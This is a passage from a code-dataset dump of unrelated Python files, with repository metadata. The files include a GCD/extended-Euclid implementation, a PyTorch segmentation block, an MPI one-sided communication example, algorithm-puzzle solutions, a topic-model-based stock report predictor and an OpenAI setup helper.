(https://en.wikipedia.org/wiki/Modulo_operation). This is the definition that is more consistent with\n# number theory as attested by the fact that the Euclidean GCD computation algorithm (that also produces,\n# in addition to the GCD, the r and s values) works for negative numbers only with the Raymond T. Boute definition\n# of Euclidean division.\ndef euclidean_division(a, b):\n '''\n Returns quotient and remainder of a divided by b according to the Euclidean division algorihm.\n >>> euclidean_division(10, 3)\n (3, 1)\n\n It fixes the built-in Python integer division implementation to ensure it also works for negative\n numbers. In particular the remainder has to always be a non-negative number less than the divisor.\n This is not observed in the default implementation of integer division in Python for the case of\n negative divisors (though it is implemented correctly for both positive and negative dividends)\n E.g.\n >>> -10 // -3\n 3\n >>> -10 % -3\n -1\n \n ... which are not correct results in my book. In my view q=4 and r=2 is the correct answer.\n This is exactly what my implementation produces:\n >>> euclidean_division(-10, -3)\n (4, 2)\n >>> euclidean_division(100, -20)\n (-5, 0)\n >>> euclidean_division(-100, -20)\n (5, 0)\n >>> euclidean_division(-100, 20)\n (-5, 0)\n >>> euclidean_division(-100, 21)\n (-5, 5)\n '''\n\n # This is exactly the Raymond T. Boute definition of Euclidean\n # division as found in Wikipedia.\n def alternate_impl(a, b):\n def sgn(b):\n assert b!=0\n if (b>0):\n return 1\n else:\n return -1\n q = sgn(b)*floor(a/abs(b))\n r = a - abs(b)*floor(a/abs(b))\n return (q, r)\n\n # below follows my own implementation which I assert (just before returning)\n # that yields results identical to the Raymond T. 
Boute definition\n if (b==0):\n raise ValueError('b cannot be zero')\n rv = None\n if (b>0): # Python implements this correctly for positive divisors (for both positive and negative dividends), see: https://stackoverflow.com/a/19518866/274677\n rv = (a // b, a % b)\n else: # problems (in my view at least) arise with negative divisors.\n rv = ( a // b if (a % b == 0) else inc(a // b), 0 if (a % b) == 0 else (a % b)-b)\n assert rv[1] >= 0\n assert rv[1] < abs(b), 'when dividing {} by {} a remainder of {} was computed - which is not less than the absolute value of {} ({})'.format(a, b, rv[1], b, abs(b))\n assert b*rv[0]+rv[1]==a\n assert rv==alternate_impl(a, b)\n return rv\n\n\ndef is_int(a):\n return type(a)==type(0)\n\n\n############################################\n# #\n# S I M P L E G C D #\n# I M P L E M E N T A T I O N S #\n# #\n############################################\n\ndef gcd_core_recursive(a, b):\n q, r = euclidean_division(b, a)\n if (r==0):\n return a\n else:\n return gcd_core_recursive(r, a)\n\n\n\ndef gcd_core_nonrecursive(_a, _b):\n a, b = _a, _b\n while True:\n q, r = euclidean_division(b, a)\n if (r==0):\n return a\n else:\n b, a = a, r\n\ndef create_gcd(gcd_core):\n def gcd(a, b):\n if (a==0) and (b==0):\n raise ValueError('a and b cannot both be zero')\n if (a==0):\n return abs(b)\n if (not (is_int(a) and is_int(b))):\n raise ValueError('both a and b must be integers (were: {} and {} respectively)'.format(a, b))\n if (a<0 or b<0):\n return gcd(abs(a), abs(b))\n if (abs(a)>abs(b)):\n return gcd(b, a)\n else:\n return gcd_core(a, b)\n return gcd\n\nclass SimpleGCDTestCases(unittest.TestCase):\n\n def setup(self):\n pass\n\n def test_a(self):\n testCases = [(1, 1, 1), (13, 13, 13), (0, 5, 5), (4, 0, 4),\n (5, 7, 1), (15, 20, 5), (100, 20, 20), (100, 35, 5), (100, 30, 10),\n (20050, 100, 50), (192348002, 123424, 14), (10003032, 92, 4)]\n for gcd_core in [gcd_core_recursive, gcd_core_nonrecursive]:\n gcd = create_gcd(gcd_core)\n for testCase in testCases:\n _a, _b, x = testCase\n for (a, b) in [(_a, _b), (_a, -_b), (-_a, _b), (-_a, -_b), (_b, _a), (_b, -_a), (-_b, _a), (-_b, -_a)]:\n g = gcd(a, b)\n self.assertEquals(g, x, 'gcd({}, {}) was {} and not {} as expected'.format(a, b, g, x))\n\n\n\n\n############################################\n# #\n# E X T E N D E D G C D #\n# I M P L E M E N T A T I O N #\n# #\n############################################\n \ndef calculate_r_s(A, B, remainder_to_dividend_divisor_quotient, a):\n assert abs(B)>=abs(A)\n if (a==B):\n return (0, 1)\n if (a==A):\n return (1, 0)\n if len(remainder_to_dividend_divisor_quotient)==1:\n # edge case\n assert remainder_to_dividend_divisor_quotient.has_key(0)\n b, a2, q = remainder_to_dividend_divisor_quotient.get(0)\n assert a2 == a\n return (1, -(q-1))\n else:\n b, a2, q = remainder_to_dividend_divisor_quotient.get(a)\n r_s_of_b = calculate_r_s(A, B, remainder_to_dividend_divisor_quotient, b)\n r_s_of_a2 = calculate_r_s(A, B, remainder_to_dividend_divisor_quotient, a2)\n return (r_s_of_b[0]-q*r_s_of_a2[0],\n r_s_of_b[1]-q*r_s_of_a2[1])\n \n \n \ndef gcd_extended(a, b):\n if (a==0) and (b==0):\n raise ValueError('a and b cannot both be zero')\n if (not (is_int(a) and is_int(b))):\n raise ValueError('both a and b must be integers (were: {} and {} respectively)'.format(a, b)) \n if (a==0):\n return (abs(b), 0, 1 if b>0 else -1)\n if (b==0):\n return (abs(a), 1 if a>0 else -1, 0)\n def _gcd_extended(a, b):\n assert abs(b)>=abs(a)\n A, B = a, b\n remainder_to_dividend_divisor_quotient = {}\n while True:\n q, 
r = euclidean_division(b, a)\n remainder_to_dividend_divisor_quotient.update({r: (b, a, q)})\n if (r==0):\n r, s = calculate_r_s(A, B, remainder_to_dividend_divisor_quotient, a)\n return (a, r, s)\n else:\n b, a = a, r\n if (abs(b)>=abs(a)):\n q, r, s = _gcd_extended(a, b)\n else:\n q, s, r = _gcd_extended(b, a)\n if (q < 0):\n return (abs(q), -r, -s)\n else:\n return (q, r, s)\n \n\n\nclass ExtendedGCDTestCases(unittest.TestCase):\n\n def setup(self):\n pass\n\n def test_a(self):\n gcd = gcd_extended\n for (a, b, g_expected) in [(2, 10, 2), (4, 10, 2), (6, 10, 2), (25, 100, 25), (25, 105, 5)\n , (100, 20050, 50), (123424, 192348002, 14), (92, 10003032, 4),\n (2, 1, 1), (1, 8, 1), (17, 1, 1), (1000007, 10003, 1), (0, 3, 3), (-92, 0, 92)\n ]:\n for (_a, _b) in [(a, b), (b, a), (-a, b), (a, -b), (-a, -b), (-b, a), (-b, -a), (-b, -a)]:\n g, r, s = gcd(_a, _b)\n assert g==g_expected, 'gcd({}, {}) calculated g = {} (was expecting: {})'.format(_a, _b, g, g_expected)\n assert g == r*_a+s*_b, 'gcd({}, {}) yielded the triplet ({}, {}, {}), which fails to satisfy {}={}*{}+{}*{}'.format(_a, _b, g, r, s, g, r, _a, s, _b)\n\n\ndef printMostComplexUseCase():\n a = 10003032\n b = 92\n \n (q, r, s) = gcd_extended(a, b)\n assert q == a*r+b*s\n print ('gcd({}, {}) = {}. Also: {} = {}*{} + {}*{}'.format(a, b, q, q, r, a, s, b))\n\nprintMostComplexUseCase()\n \nif __name__ == '__main__':\n import doctest\n doctest.testmod()\n unittest.main()\n\n","repo_name":"mperdikeas/py-abstract-algebra","sub_path":"gcd-euclidean-algorithm/gcd.py","file_name":"gcd.py","file_ext":"py","file_size_in_byte":9674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"12165661812","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.utils.model_zoo as modelzoo\n\nclass ConvBNReLU(nn.Module):\n\n def __init__(self, in_chan, out_chan, ks=3, stride=1, padding=1,\n dilation=1, groups=1, bias=False):\n super(ConvBNReLU, self).__init__()\n self.conv = nn.Conv2d(\n in_chan, out_chan, kernel_size=ks, stride=stride,\n padding=padding, dilation=dilation,\n groups=groups, bias=bias)\n self.bn = nn.BatchNorm2d(out_chan)\n self.relu = nn.ReLU(inplace=True)\n\n def forward(self, x):\n feat = self.conv(x)\n feat = self.bn(feat)\n feat = self.relu(feat)\n return feat\n\n\nclass DetailBranch(nn.Module):\n\n def __init__(self):\n super(DetailBranch, self).__init__()\n self.S1 = nn.Sequential(\n ConvBNReLU(3, 64, 3, stride=2),\n ConvBNReLU(64, 64, 3, stride=1),\n )\n self.S2 = nn.Sequential(\n ConvBNReLU(64, 64, 3, stride=2),\n ConvBNReLU(64, 64, 3, stride=1),\n ConvBNReLU(64, 64, 3, stride=1),\n )\n self.S3 = nn.Sequential(\n ConvBNReLU(64, 128, 3, stride=2),\n ConvBNReLU(128, 128, 3, stride=1),\n ConvBNReLU(128, 128, 3, stride=1),\n )\n\n def forward(self, x):\n feat = self.S1(x)\n feat = self.S2(feat)\n feat = self.S3(feat)\n return feat","repo_name":"zehantan6970/PyraBiNet","sub_path":"segmentation/detail_branch.py","file_name":"detail_branch.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"12512642221","text":"#!/usr/bin/env python3\nimport numpy as np\nimport sys\n\n\ndef main():\n if len(sys.argv) != 2:\n print(\"Usage: {0} model.npz\".format(*sys.argv))\n exit(1)\n\n filename = sys.argv[1]\n with np.load(filename) as model:\n keys = model.files\n print(f\"Inspecting {filename}, with {len(keys)} parameters\")\n for k in keys:\n param = 
model[k]\n print(f\"Parameter: {k}, shape={param.shape}\", param, sep=\"\\n\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"marian-nmt/marian-example-library","sub_path":"script/read-npz.py","file_name":"read-npz.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"6069933344","text":"\"\"\"\nThis module creates a topic model from a list of bag of word representations of documents.\nUnlike `language_model`, which is built from scratch, this module makes use of the Gensim package\n\"\"\"\n\nfrom gensim import corpora, models\nfrom util.helper_functions import *\n\n\nclass TopicModel:\n\n def __init__(self, bow_list):\n\n # construct corpus compatible with gensim\n # (a list of tuples of (tokenID, frequency) )\n vocabulary = [bow.keys() for bow in bow_list]\n dictionary = corpora.Dictionary(vocabulary)\n corpus = []\n for bow in bow_list:\n doc = []\n for key in bow.keys():\n doc.append((dictionary.token2id[key], bow[key]))\n corpus.append(doc)\n self.corpus = corpus\n self.tfidf = models.TfidfModel(corpus)\n self.corpus_tfidf = self.tfidf[corpus]\n self.dictionary = dictionary\n self.lsi_model = models.lsimodel.LsiModel(corpus=self.corpus_tfidf, id2word=self.dictionary, num_topics=100)\n self.topics = self.lsi_model.show_topics()\n\n def print_top_topics(self, topic_mixture, n=10):\n topic_mixture.sort(key=lambda id_prob: id_prob[1])\n for (topic_id, prob) in topic_mixture[:n]:\n print(\"\\t \" + str(self.topics[topic_id]) + \" \\n \\t with prob \" + str(prob))\n\n def topic_similarity(self, doc1, doc2):\n bow1 = self.dictionary.doc2bow(doc1.split(\" \"))\n topic_mixture1 = self.lsi_model[bow1]\n\n bow2 = self.dictionary.doc2bow(doc2.split(\" \"))\n topic_mixture2 = self.lsi_model[bow2]\n\n if len(topic_mixture1) == 0 or len(topic_mixture2) == 0:\n return None\n\n return cosine_similarity(topic_mixture1, topic_mixture2)\n\n","repo_name":"kharkarag/TextStyleTransfer","sub_path":"topic_model/topic_model.py","file_name":"topic_model.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"14503855448","text":"from mpi4py import MPI\nimport numpy as np\n\nimport common\n\n\ndef main():\n comm = MPI.COMM_WORLD\n rank = comm.rank\n size = comm.size\n print_mpi = common.create_print_mpi(comm)\n\n if comm.rank == 0:\n buf = np.array([1, 2], dtype=np.float32)\n else:\n buf = np.array([0, 0], dtype=np.float32)\n\n win = MPI.Win.Create(buf, comm=comm)\n\n print_mpi(buf)\n\n window_owner_rank = 1\n win.Fence()\n if comm.rank == 0:\n win.Lock(window_owner_rank)\n win.Put(buf, window_owner_rank)\n win.Unlock(window_owner_rank)\n win.Fence()\n\n print_mpi(buf)\n\nif __name__ == '__main__':\n main()\n","repo_name":"tyohei/examples","sub_path":"mpi/python/Put.py","file_name":"Put.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"38363759942","text":"import sys\nfrom collections import deque\n\ndef bfs(i,j,visit) :\n queue = deque([[i,j]]) # 큐를 [i,j]로 초기화\n melting_que = deque() # 빙하의 위치(i,j)와 인접한 바다 수를 저장\n visit[i][j] = 1 # 방문\n\n# 인접한 모든 노드들에 대해 탐색 \n while queue :\n x,y = queue.popleft() \n sea = 0 # 바다의 수\n for dx,dy in (-1,0), (1,0), (0,-1), (0,1):\n nx,ny = x+dx, y+dy\n if 0<=nx 빙산의 갯수가 0이거나 2일 경우\nwhile True :\n cnt = 0 # 빙산 개수를 담는 cnt 변수\n visit = [[0]*m for _ in range(n)] # 방문한 노드 체크 
\n for i in range(n) :\n for j in range(m) :\n if graph[i][j] !=0 and visit[i][j]==0: # 아직 탐색하지 않은 빙하\n cnt += 1 # 빙산의 갯수 추가\n melt = bfs(i,j,visit) # 빙하가 녹는 위치(i,j)와 인접한 바다 수를 저장하는 큐\n \n while melt :\n m_x, m_y, m = melt.popleft()\n graph[m_x][m_y] = max(graph[m_x][m_y]-m, 0) # 빙하 깎기 \n\n # 빙산의 갯수가 0이거나 2일 경우 반복문 종료\n if cnt == 0 :\n year = 0\n break\n elif cnt >= 2 :\n break\n year += 1 # while 반복 한번에 1년\nprint(year)\n","repo_name":"snovvow/lotuxsoo","sub_path":"2주차_BFS,DFS/[2573] 빙산.py","file_name":"[2573] 빙산.py","file_ext":"py","file_size_in_byte":2004,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"8917556660","text":"# 공이 구분되지 않으므로 방향이 바뀌면 다른 공이 그 자리를 대체한다.\n# 따라서, 충돌 후에도 같은 방향을 유지한다고 생각하면된다.\n# 임의의 두 공(nC2) 사이의 거리가 2t 이하이면서,\n# 마주보며 운동할 때만(1/4의 확률) 부딪힌다.\n# 공 하나 당 오른쪽, 왼쪽 가능 (전체 4 중에 -> <- 방향 일때만 부딪힌다.) = 1/4\n\nimport sys\ninput = sys.stdin.readline\n\nn = int(input()) # 공의 개수\nposi = list(map(int,input().split())) # 각 공의 위치\nt = int(input()) # 시간\n\nposi.sort()\ncnt = 0\n\nfor i in range(n-1):\n for j in range(i+1, n):\n if (posi[j]-posi[i]) <= 2*t:\n cnt += 1\n\nprint(cnt/4)","repo_name":"bu119/TIL","sub_path":"Algorithm/BAEKJOON/골드/13249_공의충돌.py","file_name":"13249_공의충돌.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"3637864067","text":"\"\"\"\nHello world program using python.\n\nThis just opens a blank window with title \"Hello world!\" and waits for 5 seconds before quitting.\n\nPROBLEMS:\n\n* Try changing the size of the window\n* Try changing the title of the window\n* What happens if you don't have the wait?\n\n\"\"\"\n\nimport pygame\n\npygame.init()\n\n# Set the window size\nsize = 400, 400\nscreen = pygame.display.set_mode(size)\npygame.display.set_caption('Hello world!') \n\n# wait for 5 seconds so that we can see the window\npygame.time.wait(5000)\n","repo_name":"anandology/pygame-workshop","sub_path":"game0.py","file_name":"game0.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"16567268365","text":"import pytest\nfrom action_app.controllers.base import Base\nfrom action_app.exceptions import OutputNotDirectoryError\n\n@pytest.mark.vcr\ndef test_it_outputs_to_stdout_by_default(run_app):\n app = run_app('command1', 'node1')\n data, output = app.last_rendered\n assert output.find(data['job'].stdout) != -1\n\n@pytest.mark.vcr\ndef test_saving_output_to_a_directory(run_app, tmpdir):\n stdout_path = tmpdir.join('node1.stdout')\n app = run_app('command1', 'node1', '-o', str(tmpdir))\n data, output = app.last_rendered\n job = data['job']\n assert output.find(job.stdout) == -1\n assert stdout_path.check()\n assert stdout_path.read().find(job.stdout) != -1\n\n@pytest.mark.vcr\ndef test_error_handling_if_output_is_a_file(run_app, tmpdir):\n tmpfile = tmpdir.join('file')\n tmpfile.write('')\n with pytest.raises(OutputNotDirectoryError):\n app = run_app('command1', 'node1', '-o', str(tmpfile))\n\n","repo_name":"openflighthpc/action-client-python","sub_path":"tests/test_base_controller.py","file_name":"test_base_controller.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"27118798741","text":"import os\n# Configuration system\nis_notebook = False\ntry:\n if 'google.colab' in str(get_ipython()): # 
get_ipython can be executed on google colab by default\n is_notebook = True\n from . import predictor_init, Filter, owner\n import getpass\n from google.colab import drive, files # Do not need to install google.colab when the code is executed on google colab\nexcept:\n # others cloud-based notebooks will be integrated soon...\n is_notebook = False\n import predictor_init, Filter, owner\n\nimport sys\nimport numpy as np\nimport pdfplumber\n\nfrom tkinter.filedialog import askopenfilename\nfrom builtins import staticmethod\nimport matplotlib\nmatplotlib.use('Agg')\n\nclass Predictor:\n\n A_ = \"Status First Day Low\"\n B_ = \"Status First Day Close\"\n C_ = \"Status First Week\"\n D_ = \"Status First Week Close\"\n E_ = \"Status First Month Max\"\n F_ = \"Status First Month Closed\"\n global Data_, data7\n\n def __init__(self, token: str):\n\n # system configuration\n os.environ[\"HF_HUB_DISABLE_CACHE\"] = \"1\"\n\n self.predictor_in: predictor_init.Predictor_init = predictor_init.Predictor_init(token_=token) # generate new predictor module\n self.predictor_in.load_all_models()\n self.predictor_in.load_data()\n self.predictor_in.upload_data()\n\n Data_ = self.predictor_in.Data_\n data6_save = self.predictor_in.Data_save\n data6_save['Text'] = data6_save['Text'].map(lambda x: x.split(\" \"))\n data7 = data6_save\n\n def predict_pdf(self):\n text = Filter.tokenizer_text(self.Upload_pdf())\n self.predict(text)\n\n # This function try to match two list.\n # Create a list contain elements of data and data_low that have value as success prediction\n # Value is the prediction success state\n '''def analyze(self, Data_check = Data_, data=data7, status=\"Status First Day Low\", value=1):\n Data__low = Data_check[[\"Activist\", \"Symbol\", status]]\n Data__low[\"Activist\"] = Data__low[\"Activist\"].map(\n lambda x: \" \".join([re.sub(r'[&),_(\\']', \" \", i) for i in x.split(\" \")])) # Process Activist's Name\n Data__low[\"Activist\"] = Data__low[\"Activist\"].map(lambda x: x.lower())\n Data__low = Data__low[Data__low[status] == value]\n\n # data_low are data for prediction value = 1\n # intersection between activist on campaigns file and all short activist reports\n data4_ = data.copy()\n list_ = []\n for a in list(Data__low[\"Activist\"].values):\n if a in list(data4_[\"Research firm\"].values): # select activist that are on the two lists\n list_.append(a)\n\n data4_ = data4_[data4_[\"Research firm\"].isin(list_)]\n Data__low = Data__low[Data__low[\"Activist\"].isin(list_)]\n\n # Check compatibility of Target or Symbol (Some report from campaigns don't have same target to our dataset of report)\n list_1 = []\n for i, a in enumerate(list(Data__low[\"Symbol\"].values)):\n if a in list(data4_[\"Target\"].values):\n list_1.append(a)\n\n data4_ = data4_[data4_[\"Target\"].isin(list_1)]\n Data__low = Data__low[Data__low[\"Symbol\"].isin(list_1)]\n\n final_list = []\n for name, target in zip(list(Data__low[\"Activist\"]), list(Data__low[\"Symbol\"])):\n final_list.append((name, target))\n\n data4_ = data4_[data4_[['Research firm', 'Target']].apply(tuple, axis=1).isin(final_list)]\n\n return [data4_, Data__low]'''\n\n # This function try to match two list.\n # Create a list contain elements of data and data_low that have value as success prediction\n # Value is the prediction success state\n '''def analyze2(self, Data_check=Data_, data=data7, status=\"Status First Day Low\"):\n Data__low = Data_check[[\"Activist\", \"Symbol\", status]] # Select only element of campaingns in status's value\n 
Data__low[\"Activist\"] = Data__low[\"Activist\"].map(\n lambda x: \" \".join([re.sub(r'[&),_(\\']', \" \", i) for i in x.split(\" \")])) # Process Activist's Name\n Data__low[\"Activist\"] = Data__low[\"Activist\"].map(lambda x: x.lower())\n\n # intersection between activist on compaigns file and all short activist report\n data4_ = data.copy()\n list_ = []\n for a in list(Data__low[\"Activist\"].values):\n if a in list(data4_[\"Research firm\"].values): # select activist that are on the two lists\n list_.append(a)\n\n data4_ = data4_[data4_[\"Research firm\"].isin(list_)]\n Data__low = Data__low[Data__low[\"Activist\"].isin(list_)]\n\n # Check compatibility of Target or Symbol (Some report from compaigns don't have same target to our dataset of report)\n list_1 = []\n for i, a in enumerate(list(Data__low[\"Symbol\"].values)):\n if a in list(data4_[\"Target\"].values):\n list_1.append(a)\n\n data4_ = data4_[data4_[\"Target\"].isin(list_1)]\n Data__low = Data__low[Data__low[\"Symbol\"].isin(list_1)]\n Create by Da glox k an kw anda\n\n final_list = []\n for name, target in zip(list(Data__low[\"Activist\"]), list(Data__low[\"Symbol\"])):\n final_list.append((name, target))\n\n data4_ = data4_[data4_[['Research firm', 'Target']].apply(tuple, axis=1).isin(final_list)]\n\n return [data4_, Data__low]'''\n def is_notebook(self):\n return self.is_notebook\n\n def set_is_notebook(self, value):\n self.is_notebook = value\n\n # this function return topic probability\n # topic_model refer to the BERTtopic model\n def __get_element_prob(self, topic_model, topic_model_B, text__, status='succeed'):\n proba_, proba_B = 0, 0\n if status == \"succeed\":\n topics_, prob_ = topic_model.find_topics(text__, top_n=5)\n proba_ = max(prob_)\n # print(\"A----->\", proba_)\n return proba_\n\n elif status == \"failed\":\n topics_B_, prob_B_ = topic_model_B.find_topics(text__, top_n=5) # top_n refer to number of topic to choose for research'\n proba_B = max(prob_B_)\n # print(\"B----->\", proba_B)\n return proba_B\n\n def predict(self, text):\n print(\"\\n----Start prediction----\")\n\n # first day\n succeed_first_day = self.__get_element_prob(self.predictor_in.topic_model_Data_first_day_predicted_succeed,\n self.predictor_in.topic_model_Data_first_day_predicted_failed, text)\n failed_first_day = self.__get_element_prob(self.predictor_in.topic_model_Data_first_day_predicted_succeed,\n self.predictor_in.topic_model_Data_first_day_predicted_failed, text, status='failed')\n self.__result(succeed_first_day, failed_first_day, 'the first day')\n\n # first day closed\n succeed_first_day_closed = self.__get_element_prob(self.predictor_in.topic_model_Data_first_day_predicted_constant_succeed,\n self.predictor_in.topic_model_Data_first_day_predicted_constant_failed, text)\n failed_first_day_closed = self.__get_element_prob(self.predictor_in.topic_model_Data_first_day_predicted_constant_succeed,\n self.predictor_in.topic_model_Data_first_day_predicted_constant_failed, text,\n status='failed')\n self.__result(succeed_first_day_closed, failed_first_day_closed, 'the end of the first day')\n\n # first week\n succeed_week = self.__get_element_prob(self.predictor_in.topic_model_Data_first_week_predicted_succeed,\n self.predictor_in.topic_model_Data_first_week_predicted_failed, text)\n failed_week = self.__get_element_prob(self.predictor_in.topic_model_Data_first_week_predicted_succeed,\n self.predictor_in.topic_model_Data_first_week_predicted_failed, text, status='failed')\n self.__result(succeed_week, failed_week, 'the week')\n\n # 
first week closed\n succeed_week_closed = self.__get_element_prob(self.predictor_in.topic_model_Data_first_week_predicted_constant_succeed,\n self.predictor_in.topic_model_Data_first_week_predicted_constant_failed, text)\n failed_week_closed = self.__get_element_prob(self.predictor_in.topic_model_Data_first_week_predicted_constant_succeed,\n self.predictor_in.topic_model_Data_first_week_predicted_constant_failed, text,\n status='failed')\n self.__result(succeed_week_closed, failed_week_closed, 'the end of the week')\n\n # first month\n succeed_month = self.__get_element_prob(self.predictor_in.topic_model_Data_first_month_predicted_succeed,\n self.predictor_in.topic_model_Data_first_month_predicted_failed, text)\n failed_month = self.__get_element_prob(self.predictor_in.topic_model_Data_first_month_predicted_succeed,\n self.predictor_in.topic_model_Data_first_month_predicted_failed, text, status='failed')\n self.__result(succeed_month, failed_month, 'the month')\n\n # first month closed\n succeed_month_closed = self.__get_element_prob(self.predictor_in.topic_model_Data_first_month_predicted_constant_succeed,\n self.predictor_in.topic_model_Data_first_month_predicted_constant_failed, text)\n failed_month_closed = self.__get_element_prob(self.predictor_in.topic_model_Data_first_month_predicted_constant_succeed,\n self.predictor_in.topic_model_Data_first_month_predicted_constant_failed, text,\n status='failed')\n self.__result(succeed_month_closed, failed_month_closed, 'the end of the month')\n\n print(\"----End----\")\n def predict_advanced(self, text):\n # on day of month\n succeed_day_of_month = self.__get_element_prob(self.predictor_in.topic_model_Data_first_day_to_month_predicted_constant_succeed,\n self.predictor_in.topic_model_Data_first_day_to_month_predicted_constant_failed, text)\n failed_day_of_month = self.__get_element_prob(self.predictor_in.topic_model_Data_first_day_to_month_predicted_constant_succeed,\n self.predictor_in.topic_model_Data_first_day_to_month_predicted_constant_failed, text,\n status='failed')\n self.__result(succeed_day_of_month, failed_day_of_month, 'one day of the month')\n\n # first month\n succeed_day_on_week = self.__get_element_prob(self.predictor_in.topic_model_Data_first_day_to_week_predicted_constant_succeed,\n self.predictor_in.topic_model_Data_first_day_to_week_predicted_constant_failed, text)\n failed_day_on_week = self.__get_element_prob(self.predictor_in.topic_model_Data_first_day_to_week_predicted_constant_succeed,\n self.predictor_in.topic_model_Data_first_day_to_week_predicted_constant_failed, text,\n status='failed')\n self.__result(succeed_day_on_week, failed_day_on_week, 'one day on the week')\n\n # first month closed\n succeed_3_next_week = self.__get_element_prob(self.predictor_in.topic_model_Data_first_week_to_month_predicted_constant_succeed,\n self.predictor_in.topic_model_Data_first_week_to_month_predicted_constant_failed, text)\n failed_3_next_week = self.__get_element_prob(self.predictor_in.topic_model_Data_first_week_to_month_predicted_constant_succeed,\n self.predictor_in.topic_model_Data_first_week_to_month_predicted_constant_failed, text,\n status='failed')\n self.__result(succeed_3_next_week, failed_3_next_week, 'the 3 next weeks')\n\n def __result(self, succeed, failed, period='that period'):\n print(f\"Probability of success during {period} ----->\", succeed)\n print(f\"Probability of failure during {period} ----->\", failed)\n print(\"This report indicates a probability of\",\n (\"success\" if succeed >= failed and succeed >= 
0.9 else \"failure\"),\n f\"during {period}\\n\")\n\n def __upload_file(self):\n try:\n print(\"\\nUpload a report here (PDF): \")\n file_path = askopenfilename(filetypes=[('PDF Files', '*.pdf')])\n if file_path is not None:\n return file_path\n\n except FileNotFoundError:\n print(\"Cancel uploading report\")\n sys.exit()\n\n ## Method to use on Google Colab. Exclusive!!\n def __upload_file_gc(self):\n try:\n print(\"\\nUpload a report here (PDF): \")\n uploaded = files.upload()\n for fn in uploaded.keys():\n continue\n return fn # return the filename\n\n except (FileNotFoundError,UnboundLocalError) :\n print(\"Cancel uploading report\")\n sys.exit()\n\n def __pdf_to_text(self, file_path):\n with pdfplumber.open(file_path) as pdf:\n title = file_path.split(\"/\")\n title = title[len(title)-1]\n size = pdf.stream.tell()\n print(f'User uploaded file \"{title}\" with length {size} bytes')\n text = ''\n for page in pdf.pages:\n text += page.extract_text()\n return text\n\n # Use the functions\n def Upload_pdf(self):\n global is_notebook\n self.pdf_file_path = \"\"\n if is_notebook:\n self.pdf_file_path = self.__upload_file_gc()\n else:\n self.pdf_file_path = self.__upload_file()\n text = self.__pdf_to_text(self.pdf_file_path)\n return text\n\n ## Here I check if there are failed element in our succeed list\n def __best_performance(self, test_succeed, test_failed):\n succeed, failed = 0, 0\n for elem1, elem2 in zip(test_succeed, test_failed):\n if (elem1 >= elem2):\n succeed += 1\n else:\n failed += 1\n return succeed / len(test_succeed) # 0 to 1\n\n def __get_performance(self, test_succeed, test_failed):\n print(\"performance : \", self.__best_performance(test_succeed, test_failed))\n print(\"mean succeed:\", self.__minimal_stat_(test_succeed))\n print(\"mean failed:\", self.__minimal_stat_(test_failed))\n\n def __minimal_stat_(element):\n arr = np.array(element)\n mean = np.mean(arr)\n std_dev = np.std(arr)\n\n return mean, std_dev\n\n @staticmethod\n def Login_Token():\n global is_notebook\n _token = \"\"\n if is_notebook:\n _token = getpass.getpass(owner.Text_entry_token)\n else :\n _token = input(owner.Text_entry_token)\n return _token","repo_name":"DanGlChris/short_activist_predictor","sub_path":"src/short_activist_predictor/predictor.py","file_name":"predictor.py","file_ext":"py","file_size_in_byte":15168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"21591618009","text":"import openai\nimport os\nimport numpy as np\nfrom sklearn.cluster import KMeans\nfrom sklearn.manifold import TSNE\n\ndef colorprint(txt,opt=\"222\",end='\\n'): \n #print(f'\\033[{opt}m',txt,'\\033[0m',end=end)\n print(u\"\\u001b[38;5;\"+opt+'m'+txt+u\"\\u001b[0m\",end=end)\n\ndef initialize(engine='text-ada-001'):\n\n openai.api_type = \"azure\"\n openai.api_base = os.getenv('OPENAI_API_BASE')\n openai.api_version = \"2022-12-01\"\n openai.api_key = os.getenv(\"OPENAI_API_KEY\")\n\n print(\"openai.api_type: \"+openai.api_type)\n print(\"openai.api_base: \"+ openai.api_base)\n print(\"openai.api_version: \"+openai.api_version)\n print(\"openai.api_key: \"+'***')\n\ndef project_2D(list_of_arrays_to_project):\n result=[]\n for a in list_of_arrays_to_project:\n tsne = TSNE(n_components=2, perplexity=15, random_state=42, init=\"random\", learning_rate=200)\n matrix = np.vstack(array_to_project)\n vis_dims2 = tsne.fit_transform(matrix)\n\n x = [x for x, y in vis_dims2]\n y = [y for x, y in vis_dims2]\n result.append([x,y])\n return(result)\n\n\ndef 
